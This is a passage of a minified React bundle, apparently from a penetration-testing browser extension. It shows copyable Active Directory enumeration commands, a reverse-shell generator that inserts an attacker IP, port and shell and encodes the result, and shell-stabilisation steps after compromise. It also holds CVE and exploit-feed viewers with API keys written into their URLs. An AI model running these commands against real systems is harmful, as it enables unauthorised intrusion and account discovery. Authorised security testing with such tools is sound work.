members"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},'Get-NetGroupMember -GroupName "Domain Admins"'))),n.default.createElement(p,{strong:!0},"List Admin Groups "),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"Get-NetGroup *admin*"))),n.default.createElement(p,{strong:!0},"List Local Admins [need Administrative rights] "),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"Get-NetLocalGroup -ComputerName PCNAME-001"))),n.default.createElement(p,{strong:!0},"Get groups of user [need Administrative rights] "),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},'Get-NetGroup -UserName "username"'))),n.default.createElement(r.Divider,{orientation:"center"},"ACL enumeration"),n.default.createElement(p,{strong:!0},"User ACL "),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},'Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs'))),n.default.createElement(p,{strong:!0},"GPO modifications rights"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}"))),n.default.createElement(p,{strong:!0},"Password reset rights"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},'Get-ObjectAcl -SamAccountName labuser -ResolveGUIDs -RightsFilter "ResetPassword"'))),n.default.createElement(r.Divider,{orientation:"center"},"Local reconnaissance"),n.default.createElement(p,{strong:!0},"Export user accounts with ldifde"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},'ldifde -d "OU=THING,DC=CHANGE,DC=ME" -p subtree -f dump.ldf'))),n.default.createElement(p,{strong:!0},"Export user accounts with csvde"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},'csvde -d "OU=THING,DC=CHANGE,DC=ME" -p subtree -f dump.csv'))),n.default.createElement(r.Divider,{orientation:"center"},"Active Directory scripts"),n.default.createElement(p,{strong:!0,mark:!0,style:{marginBottom:5}},"Enumerate Domain Users"),n.default.createElement("div",null,n.default.createElement(i.default,{language:"powershell",style:o.vs2015,showLineNumbers:!0},t),n.default.createElement(c.default,{component:"a","data-clipboard-text":t},n.default.createElement(r.Button,{type:"default",block:!0,style:{marginBottom:10},onClick:e},n.default.createElement(u.CopyOutlined,null),"Copy"))),n.default.createElement(p,{strong:!0,mark:!0,style:{marginBottom:5}},"Enumerate Domain Groups"),n.default.createElement("div",null,n.default.createElement(i.default,{language:"powershell",style:o.vs2015,showLineNumbers:!0},l),n.default.createElement(c.default,{component:"a","data-clipboard-text":l},n.default.createElement(r.Button,{type:"default",block:!0,style:{marginBottom:10},onClick:e},n.default.createElement(u.CopyOutlined,null),"Copy"))),n.default.createElement(p,{strong:!0,mark:!0,style:{marginBottom:5}},"Enumerate Members of a Group"),n.default.createElement("div",null,n.default.createElement(i.default,{language:"powershell",style:o.vs2015,showLineNumbers:!0},a),n.default.createElement(c.default,{component:"a","data-clipboard-text":a},n.default.createElement(r.Button,{type:"default",block:!0,style:{marginBottom:10},onClick:e},n.default.createElement(u.CopyOutlined,null),"Copy"))),n.default.createElement(p,{strong:!0,mark:!0,style:{marginBottom:5}},"Detect Service Principal Names"),n.default.createElement("div",null,n.default.createElement(i.default,{language:"powershell",style:o.vs2015,showLineNumbers:!0},m),n.default.createElement(c.default,{component:"a","data-clipboard-text":m},n.default.createElement(r.Button,{type:"default",block:!0,style:{marginBottom:10},onClick:e},n.default.createElement(u.CopyOutlined,null),"Copy")))))}},38075:function(e,t,l){"use strict";var a=this&&this.__createBinding||(Object.create?function(e,t,l,a){void 0===a&&(a=l);var n=Object.getOwnPropertyDescriptor(t,l);n&&!("get"in n?!t.__esModule:n.writable||n.configurable)||(n={enumerable:!0,get:function(){return t[l]}}),Object.defineProperty(e,a,n)}:function(e,t,l,a){void 0===a&&(a=l),e[a]=t[l]}),n=this&&this.__setModuleDefault||(Object.create?function(e,t){Object.defineProperty(e,"default",{enumerable:!0,value:t})}:function(e,t){e.default=t}),r=this&&this.__importStar||function(e){if(e&&e.__esModule)return e;var t={};if(null!=e)for(var l in e)"default"!==l&&Object.prototype.hasOwnProperty.call(e,l)&&a(t,e,l);return n(t,e),t},i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const o=r(l(50959)),c=l(35401),u=l(73706),s=i(l(31529)),d=i(l(45066)),{Title:p,Paragraph:m,Text:f}=c.Typography,v=(0,u.createFromIconfontCN)({scriptUrl:["./iconfont.js"]});t.default=function(){const e=(0,s.default)("ipv4_tcp_cache"),[t,a]=(0,o.useState)(""),[n,r]=(0,o.useState)(""),i=(0,o.useRef)(null),[h,_]=e({ip:"",port:"",shell:"/bin/sh"}),[g,y]=c.message.useMessage(),E=()=>{g.success("Your reverse shell has been copied to the clipboard!")},b=[{key:"1",label:"Base64 Encoded"},{key:"2",label:"URL Encoded"},{key:"3",label:"Double URL Encoded"}],w=e=>t=>{_(Object.assign(Object.assign({},h),{[e]:t.target.value}))},[x,k]=(0,o.useState)({}),[S,C]=(0,o.useState)({}),T=(e,t,l)=>{t(),a(e[0]),r(l)},$=[Object.assign(Object.assign({title:"Name",dataIndex:"name",key:"name",filteredValue:x.name||null,onFilter:(e,t)=>t.name.includes(e),sorter:(e,t)=>e.name.length-t.name.length},(O="name",{filterDropdown:({setSelectedKeys:e,selectedKeys:t,confirm:l,clearFilters:n,close:s})=>o.default.createElement("div",{style:{padding:8},onKeyDown:e=>e.stopPropagation()},o.default.createElement(c.Input,{ref:i,placeholder:`Search ${O}`,value:t[0],onChange:t=>e(t.target.value?[t.target.value]:[]),onPressEnter:()=>T(t,l,O),style:{marginBottom:8,display:"block"}}),o.default.createElement(c.Space,null,o.default.createElement(c.Button,{type:"primary",onClick:()=>T(t,l,O),icon:o.default.createElement(u.SearchOutlined,null),size:"small",style:{width:90}},"Search"),o.default.createElement(c.Button,{onClick:()=>n&&(e=>{e(),a("")})(n),size:"small",style:{width:90}},"Reset"),o.default.createElement(c.Button,{type:"link",size:"small",onClick:()=>{l({closeDropdown:!1}),a(t[0]),r(O)}},"Filter"),o.default.createElement(c.Button,{type:"link",size:"small",onClick:()=>{s()}},"Close"))),filterIcon:e=>o.default.createElement(u.SearchOutlined,{style:{color:e?"#1890ff":void 0}}),onFilter:(e,t)=>t[O].toString().toLowerCase().includes(e.toLowerCase()),onFilterDropdownVisibleChange:e=>{e?setTimeout((()=>{var e;null===(e=i.current)||void 0===e||e.select()}),100):r("")},render:e=>n===O?o.default.createElement(d.default,{highlightStyle:{backgroundColor:"#ffc069",padding:0},searchWords:[t],autoEscape:!0,textToHighlight:e?e.toString():""}):e})),{sortOrder:"name"===S.columnKey?S.order:null,ellipsis:!0}),{title:"Tags",dataIndex:"tags",key:"tags",render:(e,{tags:t})=>o.default.createElement(o.default.Fragment,null,t.map((e=>{switch(e){case"linux":return o.default.createElement(c.Tag,{color:"volcano",key:e},e.toUpperCase());case"mac":return o.default.createElement(c.Tag,{color:"green",key:e},e.toUpperCase());case"windows":return o.default.createElement(c.Tag,{color:"blue",key:e},e.toUpperCase());default:return o.default.createElement(c.Tag,{color:"black",key:e},e.toUpperCase())}}))),filters:[{text:"Linux",value:"linux"},{text:"macOS",value:"mac"},{text:"Windows",value:"windows"}],filteredValue:x.tags||null,onFilter:(e,t)=>t.tags.includes(e),sortOrder:"tags"===S.columnKey?S.order:null,ellipsis:!0},{title:"Action",dataIndex:"action",key:"action",render:(e,{command:t})=>o.default.createElement(o.default.Fragment,null,o.default.createElement(c.Dropdown.Button,{menu:{items:b,onClick:e=>{switch(e.key){case"1":E(),navigator.clipboard.writeText(btoa(t));break;case"2":E(),navigator.clipboard.writeText(encodeURIComponent(t));break;case"3":E(),navigator.clipboard.writeText(encodeURIComponent(encodeURIComponent(t)));break;default:E()}}},onClick:()=>{E(),navigator.clipboard.writeText(t)}},"Copy"))}];var O;const P=l(23191).map((e=>({key:e.id,name:e.name,tags:e.tags,command:e.command})));return P.forEach((e=>{e.command&&(e.command=e.command.replace(/\${values.ip}/g,String(h.ip)),e.command=e.command.replace(/\${values.port}/g,String(h.port)),e.command=e.command.replace(/\{shell}/g,String(h.shell)))})),o.default.createElement("div",null,y,o.default.createElement("div",null,o.default.createElement(p,{level:2,style:{fontWeight:"bold",margin:15}},"Reverse shell"),o.default.createElement(m,{style:{margin:15}},'A reverse shell is a type of network communication in which a connection is established from a remote host (the "attacker") to a target host (the "victim") and the attacker is able to execute commands on the victim\'s machine as if they were running on the attacker\'s machine. This is typically done by exploiting a vulnerability in the victim\'s system or by tricking the victim into running a malicious program that establishes the reverse shell.'),o.default.createElement("div",{style:{padding:15}},o.default.createElement(c.Row,{gutter:{xs:8,sm:16,md:24,lg:32}},o.default.createElement(c.Col,{span:8},o.default.createElement(c.Input,{maxLength:15,prefix:o.default.createElement(u.WifiOutlined,null),name:"Ip adress",placeholder:"IP Address or domain (ex: 212.212.111.222)",onChange:w("ip"),value:h.ip})),o.default.createElement(c.Col,{span:8},o.default.createElement(c.Input,{maxLength:5,prefix:o.default.createElement(v,{type:"icon-Network-Plug"}),name:"Port",placeholder:"Port (ex: 1337)",onChange:w("port"),value:h.port})),o.default.createElement(c.Col,{span:8},o.default.createElement(c.Form.Item,{name:"shell",valuePropName:String(h.shell),label:"Shell"},o.default.createElement(c.Select,{onChange:("shell",e=>{_(Object.assign(Object.assign({},h),{shell:e}))}),placeholder:"/bin/sh",value:String(h.shell),allowClear:!0,options:[{label:"Linux / macOS",options:[{label:"sh",value:"sh"},{label:"/bin/sh",value:"/bin/sh"},{label:"bash",value:"bash"},{label:"/bin/bash",value:"/bin/bash"}]},{label:"Windows",options:[{label:"cmd",value:"cmd"},{label:"powershell",value:"powershell"},{label:"pwsh",value:"pwsh"}]}]})))))),o.default.createElement("div",null,o.default.createElement(c.Table,{columns:$,expandable:{expandedRowRender:e=>o.default.createElement(m,null,o.default.createElement("pre",null,o.default.createElement(f,{copyable:!0},e.command))),rowExpandable:e=>"Not Expandable"!==e.name},dataSource:P,onChange:h.ip&&h.port&&h.shell?(e,t,l)=>{k(t),C(l)}:void 0})))}},88013:function(e,t,l){"use strict";var a=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const n=a(l(50959)),r=l(35401),{Title:i,Paragraph:o,Text:c}=r.Typography;t.default=function(){return n.default.createElement("div",null,n.default.createElement(i,{level:2,style:{fontWeight:"bold",margin:15}},"TTY Spawn Shell"),n.default.createElement(o,{style:{margin:15}},"Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.",n.default.createElement(r.Divider,{dashed:!0})),n.default.createElement("div",{style:{padding:15}},n.default.createElement(r.Space,{direction:"vertical"},n.default.createElement(i,{level:4},"All the steps to stabilize your shell"),n.default.createElement(o,null,n.default.createElement("strong",null,"The first step:"),n.default.createElement("pre",null,n.default.createElement(c,null,"python3 -c 'import pty;pty.spawn(\"/bin/bash\")'")),"Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys."),n.default.createElement(o,null,n.default.createElement("strong",null,"Step two is:"),n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},"export TERM=xterm")),"This will give us access to term commands such as clear."),n.default.createElement(o,null,n.default.createElement("strong",null,"Finally (and most importantly) we will background the shell using"),n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},"Ctrl + Z")),"Back in our own terminal we use",n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},"stty raw -echo; fg")),"This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes",n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0,editable:!0},"stty rows 38 columns 116"))))))}},12650:function(e,t,l){"use strict";var a=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const n=a(l(50959)),r=a(l(17773)),i=a(l(31529));t.default=()=>{const[e,t]=(0,i.default)("notepad")("");return n.default.createElement("div",{className:"container"},n.default.createElement(r.default,{textareaProps:{placeholder:"This is an offline markdown editor to help you take some small notes (data is kept in your browser localstorage)"},value:e||"",onChange:t,height:500}))}},10454:function(e,t,l){"use strict";var a=this&&this.__awaiter||function(e,t,l,a){return new(l||(l=Promise))((function(n,r){function i(e){try{c(a.next(e))}catch(e){r(e)}}function o(e){try{c(a.throw(e))}catch(e){r(e)}}function c(e){var t;e.done?n(e.value):(t=e.value,t instanceof l?t:new l((function(e){e(t)}))).then(i,o)}c((a=a.apply(e,t||[])).next())}))},n=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const r=n(l(50959)),i=l(35401),o=l(91861),c=l(28620),u=l(1759),s=n(l(82997)),{Title:d}=i.Typography,p=()=>a(void 0,void 0,void 0,(function*(){return(yield fetch("https://api.rss2json.com/v1/api.json?rss_url=https%3A%2F%2Fcxsecurity.com%2Fwlb%2Frss%2Fvulnerabilities%2F&api_key=cpe1hekkfknhpeqov1hvcojojd9csg01yqybwsaw&count=100")).json()}));t.default=function(){const{data:e,status:t}=(0,u.useQuery)("cisco",p);return r.default.createElement("div",null,r.default.createElement(o.PageHeader,{onBack:()=>(0,c.goTo)(s.default),title:"Vulnerabilities Database",subTitle:"World Laboratory of Bugtraq 2 CXSecurity.com"}),"loading"===t&&r.default.createElement("div",{style:{textAlign:"center"}},r.default.createElement(i.Spin,null),r.default.createElement(i.Empty,null)),"error"===t&&r.default.createElement(r.default.Fragment,null,r.default.createElement(i.Empty,{image:"https://gw.alipayobjects.com/zos/antfincdn/ZHrcdLPrvN/empty.svg",imageStyle:{height:60},description:r.default.createElement("span",null,"Error getting the data please contact us.")},r.default.createElement(i.Button,{href:"https://github.com/LasCC/Hack-Tools/issues",target:"blank",danger:!0},"Report the bug"))),"success"===t&&r.default.createElement("div",{key:"a",style:{padding:15}},r.default.createElement(d,{level:4,style:{fontWeight:"bold",marginTop:15}},"Recent Vulnerabilities"),r.default.createElement(i.List,{itemLayout:"horizontal",dataSource:e.items,style:{marginTop:15},renderItem:e=>r.default.createElement(i.List.Item,{actions:[r.default.createElement("div",null,(()=>{const t=e.content.match(/Risk: (\w{1,})/);if(!t)return"None";switch(t[1]){case"High":return r.default.createElement(i.Tag,{color:"red"},t[1]);case"Medium":return r.default.createElement(i.Tag,{color:"orange"},t[1]);case"Low":return r.default.createElement(i.Tag,{color:"green"},t[1]);default:return"None"}})()),r.default.createElement(i.Tag,{color:"geekblue",style:{marginLeft:5}},e.author)]},r.default.createElement("a",{href:e.link,target:"_blank",rel:"noreferrer noopener"},e.title))})))}},50249:function(e,t,l){"use strict";var a=this&&this.__createBinding||(Object.create?function(e,t,l,a){void 0===a&&(a=l);var n=Object.getOwnPropertyDescriptor(t,l);n&&!("get"in n?!t.__esModule:n.writable||n.configurable)||(n={enumerable:!0,get:function(){return t[l]}}),Object.defineProperty(e,a,n)}:function(e,t,l,a){void 0===a&&(a=l),e[a]=t[l]}),n=this&&this.__setModuleDefault||(Object.create?function(e,t){Object.defineProperty(e,"default",{enumerable:!0,value:t})}:function(e,t){e.default=t}),r=this&&this.__importStar||function(e){if(e&&e.__esModule)return e;var t={};if(null!=e)for(var l in e)"default"!==l&&Object.prototype.hasOwnProperty.call(e,l)&&a(t,e,l);return n(t,e),t},i=this&&this.__awaiter||function(e,t,l,a){return new(l||(l=Promise))((function(n,r){function i(e){try{c(a.next(e))}catch(e){r(e)}}function o(e){try{c(a.throw(e))}catch(e){r(e)}}function c(e){var t;e.done?n(e.value):(t=e.value,t instanceof l?t:new l((function(e){e(t)}))).then(i,o)}c((a=a.apply(e,t||[])).next())}))},o=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const c=r(l(50959)),u=l(35401),s=l(91861),d=l(73706),p=l(28620),m=l(1759),f=o(l(45386)),{Paragraph:v,Title:h,Text:_}=u.Typography,{Search:g}=u.Input;t.default=function(){const[e,t]=(0,c.useState)({cve:"CVE-2017-0146"}),{isLoading:l,isError:a,data:n,refetch:r,isFetching:o}=(0,m.useQuery)("cve",(()=>i(this,void 0,void 0,(function*(){return(yield fetch(`https://corsproxy.io/?https://cve.circl.lu/api/cve/${e.cve}`)).json()}))));return l?c.default.createElement("div",{style:{textAlign:"center",marginTop:25}},c.default.createElement(u.Spin,{tip:"Loading..."})):a?c.default.createElement("div",null,c.default.createElement(u.Empty,{style:{marginTop:25},image:"https://gw.alipayobjects.com/zos/antfincdn/ZHrcdLPrvN/empty.svg",imageStyle:{height:60},description:c.default.createElement("span",null,"Error getting the data please contact us.")},c.default.createElement(u.Button,{href:"https://github.com/LasCC/Hack-Tools/issues",target:"blank",danger:!0},"Report the bug"))):c.default.createElement("div",null,c.default.createElement(s.PageHeader,{onBack:()=>(0,p.goTo)(f.default),title:"CVE Search engine",extra:[c.default.createElement(u.Button,{key:"1",href:"https://www.cve-search.org/",target:"blank",type:"primary"},"Visit orignal website")]}),c.default.createElement(g,{name:"CVE",size:"large",enterButton:!0,allowClear:!0,placeholder:"Enter your CVE ex : CVE-2017-0146",onChange:("cve",l=>{t(Object.assign(Object.assign({},e),{cve:l.target.value}))}),onSubmit:()=>r(),onSearch:()=>r()}),null!=n?c.default.createElement("div",null,c.default.createElement("div",{key:"a",style:{padding:15}},c.default.createElement(u.Descriptions,{title:"CVE Info",style:{marginTop:15}},c.default.createElement(u.Descriptions.Item,{label:"Published"},c.default.createElement(u.Tag,{color:"blue"},n.Published.slice(n.Published.indexOf("20"),n.Published.lastIndexOf("0")-8))),c.default.createElement(u.Descriptions.Item,{label:"Modified"},c.default.createElement(u.Tag,{color:"geekblue"},n.Modified.slice(n.Modified.indexOf("20"),n.Modified.lastIndexOf("0")-8))),c.default.createElement(u.Descriptions.Item,{label:"CCVS"},n.cvss>=.1&&n.cvss<=3.9?c.default.createElement(u.Tag,{color:"success"},n.cvss):n.cvss>=4&&n.cvss<=6.9?c.default.createElement(u.Tag,{color:"warning"},n.cvss):n.cvss>=7&&n.cvss<=10?c.default.createElement(u.Tag,{color:"error"},n.cvss):void 0),c.default.createElement(u.Descriptions.Item,{label:"CVE ID"},c.default.createElement(u.Tag,{color:"purple"},n.id)),c.default.createElement(u.Descriptions.Item,{label:"Severity"},n.cvss>=.1&&n.cvss<=3.9?c.default.createElement(v,{strong:!0,style:{color:"#389e0d"}},"LOW"):n.cvss>=4&&n.cvss<=6.9?c.default.createElement(v,{strong:!0,type:"warning"},"MEDIUM"):n.cvss>=7&&n.cvss<=8.9?c.default.createElement(v,{strong:!0,style:{color:"#f5222d"}},"HIGH"):n.cvss>=9&&n.cvss<=10?c.default.createElement(v,{strong:!0,style:{color:"#820014"}},"CRITICAL"):void 0),c.default.createElement(u.Descriptions.Item,{label:"Vector"},n.access.vector)),c.default.createElement(v,{ellipsis:{rows:2,expandable:!0,symbol:"more"},style:{marginTop:10}},n.summary)),c.default.createElement(u.Divider,{dashed:!0}),c.default.createElement("div",{key:"b",style:{padding:15}},c.default.createElement(h,{level:3},"References / Documentation"),c.default.createElement(u.List,{itemLayout:"horizontal",dataSource:n.references,style:{marginTop:15},renderItem:e=>c.default.createElement(u.List.Item,null,c.default.createElement("a",{href:e,target:"_blank",rel:"noreferrer noopener"},e))}))):c.default.createElement(u.Result,{status:"error",title:"Something went wrong",subTitle:"Please check and modify the following information before resubmitting."},c.default.createElement("div",{className:"desc"},c.default.createElement(v,null,c.default.createElement(_,{strong:!0,style:{fontSize:16}},"The content you submitted has the following error:")),c.default.createElement(v,null,c.default.createElement(d.CloseCircleOutlined,{className:"site-result-demo-error-icon"})," The value that you submitted"," ",c.default.createElement("b",null,"does not exist"),"."),c.default.createElement(v,null,c.default.createElement(d.CloseCircleOutlined,{className:"site-result-demo-error-icon"})," The"," ",c.default.createElement("b",null,"API is in maintenance"),", please try again."))),c.default.createElement("div",null,o?c.default.createElement("div",{style:{textAlign:"center",marginTop:25}},c.default.createElement(u.Spin,{tip:"Loading..."})):null))}},82777:function(e,t,l){"use strict";var a=this&&this.__awaiter||function(e,t,l,a){return new(l||(l=Promise))((function(n,r){function i(e){try{c(a.next(e))}catch(e){r(e)}}function o(e){try{c(a.throw(e))}catch(e){r(e)}}function c(e){var t;e.done?n(e.value):(t=e.value,t instanceof l?t:new l((function(e){e(t)}))).then(i,o)}c((a=a.apply(e,t||[])).next())}))},n=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const r=n(l(50959)),i=l(35401),o=l(91861),c=l(28620),u=l(1759),s=n(l(45386)),{Title:d}=i.Typography,p=()=>a(void 0,void 0,void 0,(function*(){return(yield fetch("https://api.rss2json.com/v1/api.json?rss_url=https%3A%2F%2Ftools.cisco.com%2Fsecurity%2Fcenter%2Fpsirtrss20%2FCiscoSecurityAdvisory.xml&api_key=spbf63tt7rvx2r0wh2x6yoz00ssjyztpceqqkdj3&count=20")).json()}));t.default=function(){const{data:e,status:t}=(0,u.useQuery)("cisco",p);return r.default.createElement("div",null,r.default.createElement(o.PageHeader,{onBack:()=>(0,c.goTo)(s.default),title:"Feed RSS",subTitle:"Cisco Security Advisories",extra:[r.default.createElement(i.Button,{href:"https://tools.cisco.com/security/center/publicationListing.x",target:"blank",key:"1",type:"primary"},"Visit orignal website")]}),"loading"===t&&r.default.createElement("div",{style:{textAlign:"center"}},r.default.createElement(i.Spin,null),r.default.createElement(i.Empty,null)),"error"===t&&r.default.createElement("div",null,r.default.createElement(i.Empty,{image:"https://gw.alipayobjects.com/zos/antfincdn/ZHrcdLPrvN/empty.svg",imageStyle:{height:60},description:r.default.createElement("span",null,"Error getting the data please contact us.")},r.default.createElement(i.Button,{danger:!0},r.default.createElement("a",{href:"https://github.com/LasCC/Hack-Tools/issues",rel:"noreferrer noopener",target:"_blank"},"Report the bug")))),"success"===t&&r.default.createElement("div",{key:"a",style:{padding:15}},r.default.createElement(d,{level:4,style:{fontWeight:"bold",marginTop:15}},"Recent exploit"),r.default.createElement(i.List,{itemLayout:"horizontal",dataSource:e.items,style:{marginTop:15},renderItem:e=>r.default.createElement(i.List.Item,{actions:[r.default.createElement("div",null,(()=>{const t=e.content.match(/( )[a-zA-Z]+/)[0];switch(t){case" Critical":return r.default.createElement(i.Tag,{color:"red"},t);case" High":return r.default.createElement(i.Tag,{color:"magenta"},t);case" Medium":return r.default.createElement(i.Tag,{color:"orange"},t);case" Low":return r.default.createElement(i.Tag,{color:"lime"},t);case" Informational":return r.default.createElement(i.Tag,{color:"blue"},t);default:return"None"}})()),r.default.createElement(i.Tag,{color:"geekblue",style:{marginLeft:5}},(()=>{const t=e.content.match(/CVE-(\d{4})-(\d{4,5})/);return t?t[0]:"None"})())]},r.default.createElement("a",{href:e.link,target:"_blank",rel:"noreferrer noopener"},e.title))})))}},82997:function(e,t,l){"use strict";var a=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const n=a(l(50959)),r=l(35401),i=l(91861),o=l(28620),c=l(73706),u=a(l(45386)),s=a(l(95333)),d=a(l(10454)),p=a(l(7361)),{Paragraph:m}=r.Typography,{Meta:f}=r.Card;t.default=function(){return n.default.createElement("div",null,n.default.createElement(i.PageHeader,{onBack:()=>(0,o.goTo)(u.default),title:"CX Security Independent RSS",extra:[n.default.createElement(r.Button,{href:"https://cxsecurity.com",key:"1",type:"primary"},"Visit orignal website")]}),n.default.createElement(r.Row,{gutter:[32,24],style:{padding:15}},n.default.createElement(r.Col,{span:12},n.default.createElement(r.Card,{onClick:()=>(0,o.goTo)(d.default),style:{cursor:"pointer",boxShadow:"0 0px 3.6px rgba(0, 0, 0, 0.017), 0 0px 10px rgba(0, 0, 0, 0.025), 0 0px 24.1px rgba(0, 0, 0, 0.033), 0 0px 80px rgba(0, 0, 0, 0.05)"},cover:n.default.createElement("img",{alt:"bugs_security_illustration",src:"../../assets/img/security-bugs.jpg"})},n.default.createElement(f,{title:"Bugs",description:"Vulnerabilities Database"}))),n.default.createElement(r.Col,{span:12},n.default.createElement(r.Card,{onClick:()=>(0,o.goTo)(s.default),style:{cursor:"pointer",boxShadow:"0 0px 3.6px rgba(0, 0, 0, 0.017), 0 0px 10px rgba(0, 0, 0, 0.025), 0 0px 24.1px rgba(0, 0, 0, 0.033), 0 0px 80px rgba(0, 0, 0, 0.05)"},cover:n.default.createElement("img",{alt:"exploit_illustration",src:"../../assets/img/Capture.png"})},n.default.createElement(f,{title:"Exploit",description:"The Exploit Database"}))),n.default.createElement(r.Col,{span:12},n.default.createElement(r.Card,{onClick:()=>(0,o.goTo)(p.default),style:{cursor:"pointer",boxShadow:"0 0px 3.6px rgba(0, 0, 0, 0.017), 0 0px 10px rgba(0, 0, 0, 0.025), 0 0px 24.1px rgba(0, 0, 0, 0.033), 0 0px 80px rgba(0, 0, 0, 0.05)"},cover:n.default.createElement("img",{alt:"cve_image_logo",src:"../../assets/img/Computer-security-Exploit-000055689534_Medium.jpg"})},n.default.createElement(f,{title:"Dorks",description:"Dorks Database WLB2"})))),n.default.createElement("div",{style:{textAlign:"center"}},n.default.createElement(m,null,"You have a suggestion about the feed ?"),n.default.createElement(r.Button,{href:"https://github.com/LasCC/Hack-Tools/issues/new",target:"blank",icon:n.default.createElement(c.GithubOutlined,null),type:"link"},"Give us your feedback")))}},7361:function(e,t,l){"use strict";var a=this&&this.__awaiter||function(e,t,l,a){return new(l||(l=Promise))((function(n,r){function i(e){try{c(a.next(e))}catch(e){r(e)}}function o(e){try{c(a.throw(e))}catch(e){r(e)}}function c(e){var t;e.done?n(e.value):(t=e.value,t instanceof l?t:new l((function(e){e(t)}))).then(i,o)}c((a=a.apply(e,t||[])).next())}))},n=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const r=n(l(50959)),i=l(35401),o=l(91861),c=l(28620),u=l(1759),s=n(l(82997)),{Title:d}=i.Typography,p=()=>a(void 0,void 0,void 0,(function*(){return(yield fetch("https://api.rss2json.com/v1/api.json?rss_url=https%3A%2F%2Fcxsecurity.com%2Fwlb%2Frss%2Fdorks%2F&api_key=cpe1hekkfknhpeqov1hvcojojd9csg01yqybwsaw&count=100")).json()}));t.default=function(){const{data:e,status:t}=(0,u.useQuery)("cisco",p);return r.default.createElement("div",null,r.default.createElement(o.PageHeader,{onBack:()=>(0,c.goTo)(s.default),title:"Vulnerabilities Database",subTitle:"World Laboratory of Bugtraq 2 CXSecurity.com"}),"loading"===t&&r.default.createElement("div",{style:{textAlign:"center"}},r.default.createElement(i.Spin,null),r.default.createElement(i.Empty,null)),"error"===t&&r.default.createElement(r.default.Fragment,null,r.default.createElement(i.Empty,{image:"https://gw.alipayobjects.com/zos/antfincdn/ZHrcdLPrvN/empty.svg",imageStyle:{height:60},description:r.default.createElement("span",null,"Error getting the data please contact us.")},r.default.createElement(i.Button,{href:"https://github.com/LasCC/Hack-Tools/issues",target:"blank",danger:!0},"Report the bug"))),"success"===t&&r.default.createElement("div",{key:"a",style:{padding:15}},r.default.createElement(d,{level:4,style:{fontWeight:"bold",marginTop:15}},"Recent Dorks"),r.default.createElement(i.List,{itemLayout:"horizontal",dataSource:e.items,style:{marginTop:15},renderItem:e=>r.default.createElement(i.List.Item,{actions:[r.default.createElement(i.Tag,{color:"geekblue",style:{marginLeft:5}},e.author?e.author:"None")]},r.default.createElement("a",{href:e.link,target:"_blank",rel:"noreferrer noopener"},e.title))})))}},95333:function(e,t,l){"use strict";var a=this&&this.__awaiter||function(e,t,l,a){return new(l||(l=Promise))((function(n,r){function i(e){try{c(a.next(e))}catch(e){r(e)}}function o(e){try{c(a.throw(e))}catch(e){r(e)}}function c(e){var t;e.done?n(e.value):(t=e.value,t instanceof l?t:new l((function(e){e(t)}))).then(i,o)}c((a=a.apply(e,t||[])).next())}))},n=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const r=n(l(50959)),i=l(35401),o=l(91861),c=l(28620),u=l(1759),s=n(l(82997)),{Title:d}=i.Typography,p=()=>a(void 0,void 0,void 0,(function*(){return(yield fetch("https://api.rss2json.com/v1/api.json?rss_url=https%3A%2F%2Fcxsecurity.com%2Fwlb%2Frss%2Fexploit%2F&api_key=cpe1hekkfknhpeqov1hvcojojd9csg01yqybwsaw&count=100")).json()}));t.default=function(){const{data:e,status:t}=(0,u.useQuery)("cisco",p);return r.default.createElement("div",null,r.default.createElement(o.PageHeader,{onBack:()=>(0,c.goTo)(s.default),title:"Exploit Database",subTitle:"World Laboratory of Bugtraq 2 CXSecurity.com"}),"loading"===t&&r.default.createElement("div",{style:{textAlign:"center"}},r.default.createElement(i.Spin,null),r.default.createElement(i.Empty,null)),"error"===t&&r.default.createElement(r.default.Fragment,null,r.default.createElement(i.Empty,{image:"https://gw.alipayobjects.com/zos/antfincdn/ZHrcdLPrvN/empty.svg",imageStyle:{height:60},description:r.default.createElement("span",null,"Error getting the data please contact us.")},r.default.createElement(i.Button,{danger:!0},r.default.createElement("a",{href:"https://github.com/LasCC/Hack-Tools/issues",rel:"noreferrer noopener",target:"_blank"},"Report the 